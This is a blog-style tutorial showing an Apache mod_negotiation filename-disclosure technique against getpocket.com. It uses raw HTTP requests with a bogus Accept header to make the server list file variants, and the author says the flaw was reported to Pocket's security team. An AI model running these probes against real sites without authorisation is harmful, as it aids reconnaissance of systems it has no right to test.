Apache mod_negotiation filename bruteforcing ( file-name buster ) vulnerability with LIVE Example
Hey Ya Geeks ,,
Am Praveen Nair for Team Kerala Cyber Squad - India.
Today am going to share a less known File-Name bruteforcing ( File-name Buster ) Attack on Apache server , even though its risk level is low I found it interesting so thought of sharing it with you all, so lets go into it without wasting much time :)
[+] THINGS YOU GONNA NEED
#>> A TOOL TO INTERCEPT THE HEADER REQUEST AND RESPONSE ( LIKE BURP , LIVE HTTP HEADER .....ETC ETC )
#>> IMPORTANT THINGS >> GOOD EYES TO WATCH OUT FOR THE HOLES. :D
>> BRAIN TOO :p
[+] TARGET = Pocket's main-domain (i.e) http://getpocket.com/
[+] VULNERABILITY = Apache mod_negotiation filename bruteforcing vulnerability
#>> RISK :- INFORMATION DISCLOSURE ( LOW )
#>> WHAT ACTUALLY IS THIS ATTACK ??? \0_0/
The mod_negotiation is an Apache module responsible for selecting the document that best matches the clients capabilities, from one of several available documents. If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing. This behavior can help an attacker to learn more about his target, for example, generate a list of base names, generate a list of interesting extensions, look for backup files and so on.
MultiViews is an Apache option which acts with the following rules:
If the server receives a request for /some/dir/foo, if /some/dir has MultiViews enabled, and /some/dir/foo does not exist, then the server reads the directory looking for files named foo.*, and effectively fakes up a type map which names all those files, assigning them the same media types and content-encodings it would have if the client had asked for one of them by name. It then chooses the best match to the client's requirements.
#>> HOW TO ATTACK / VERIFICATION AND RE-GENERATION ?? :N
It depends on several Accept* headers in the client Request.
Accept
Accept-Language
Accept-Encoding
SO, Let's see how it actually works:
Turn on the INTERCEPTOR tool an stay connected.
The case is, Suppose If an attacker requests "index" without any extension through a HTTP Header Request :
All he have to do is just use http://site.com/index in the address bar and press enter (as here we have the target as http://getpocket.com/ ) lets see what have we got in the request header.
#>> HTTP Header Request :-
GET http://getpocket.com/index HTTP/1.1
Host: getpocket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
and here focus on the Parameter" Accept" with value "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" and as here we want */* value of Accept parameter request we use a "Accept:" header with an existent mime type ( */* ).
#>> HTTP Header Response :-
HTTP/1.1 200 OK
Content-Location: index.php
Content-Type: text/html; charset=UTF-8
Date: Fri, 04 Oct 2013 18:10:48 GMT
P3P: policyref="/w3c/p3p.xml", CP="ALL CURa ADMa DEVa OUR IND UNI COM NAV INT STA PRE"
Server: Apache
Set-Cookie: sess_guid=by5A1g73dR504Tb2fup4e11phRT8d332f40B54F617tjt7a56416dma8rd7WU171; expires=Sat, 30-Sep-2028 18:10:48 GMT; path=/; domain=getpocket.com
Set-Cookie: sess_start_time=1380910248; path=/; domain=.getpocket.com
TCN: choice
Vary: negotiate
x-frame-options: SAMEORIGIN
Transfer-Encoding: chunked
Connection: keep-alive
Now, it could be noticed that in the server response several interesting headers are out:
Content-Location: index.php
Vary: negotiate
TCN: choice
This means there is MultiViews enabled on / directory as it automatically selects the file index.php .
Let's see if in the request we use a "Accept:" header with an inexistent mime type ( test/hell ):
#>> HTTP Header Request :-
GET http://getpocket.com/index HTTP/1.1
Host: getpocket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9;q=0.8
Accept: test/hell
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
#>> HTTP Header Response :-
HTTP/1.1 406 Not Acceptable
Alternates: {"index.php" 1 {type text/html}}
Content-Type: text/html; charset=iso-8859-1
Date: Fri, 04 Oct 2013 18:23:33 GMT
Server: Apache
TCN: list
Vary: negotiate
Content-Length: 410
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>406 Not Acceptable</title>
</head><body>
<h1>Not Acceptable</h1>
<p>An appropriate representation of the requested resource /index could not be found on this server.</p>
Available variants:
<ul>
<li><a href="index.php">index.php</a> , type text/html</li>
</ul>
<hr>
<address>Apache Server at getpocket.com Port 80</address>
</body></html>
woo! With a single request we get a listing of all the files! ;)
Well,yeah. Not really *all* the files but every file with the same name requested and with an extension listed in mime-types file.
This means that if index.whatever* is on the server it will be listed.
Similarly, The attacker can use any file name in place of "index" in this case so as a result can result in a filename bruteforcing with mod_negotiation an Apache module.
Hope This Tut was a lil bit informational to you all ,. :)
[+] This vulneability was reported to GetPocket Security Team, and as a result They rewarded me by adding my name in there Hall of Fame
Thanks for having a look at this post . :)
Please leave your comments below.
Praveen Nair ( c0d3 c0m4dr3 404 )
Team - Kerala Cyber Squad - India
./xit n 0ut